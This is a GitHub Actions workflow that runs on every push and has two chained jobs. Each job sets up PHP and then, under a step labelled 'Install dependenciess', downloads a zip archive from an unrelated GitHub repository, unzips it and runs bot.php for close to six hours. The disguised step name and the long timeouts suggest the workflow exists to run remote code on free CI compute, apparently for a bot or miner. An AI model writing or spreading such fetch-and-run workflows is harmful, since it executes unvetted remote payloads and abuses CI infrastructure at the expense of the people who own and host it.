on:
  push:
name: hhsu

jobs:
  run_1:
    runs-on: ubuntu-latest
    continue-on-error: true
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.1'
        coverage: none
    - name: Install dependenciess
      run: |
        wget https://github.com/Yabof386/pyconbu/raw/main/conb/grb.zip
        unzip grb.zip
        timeout 357m php bot.php
        
  run_2:
    
    runs-on: ubuntu-latest
    needs: ["run_1"]
    continue-on-error: true
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '8.1'
        coverage: none
    - name: Install dependenciess
      run: |
        wget https://github.com/Yabof386/pyconbu/raw/main/conb/grb.zip
        unzip grb.zip
        timeout 357m php bot.php
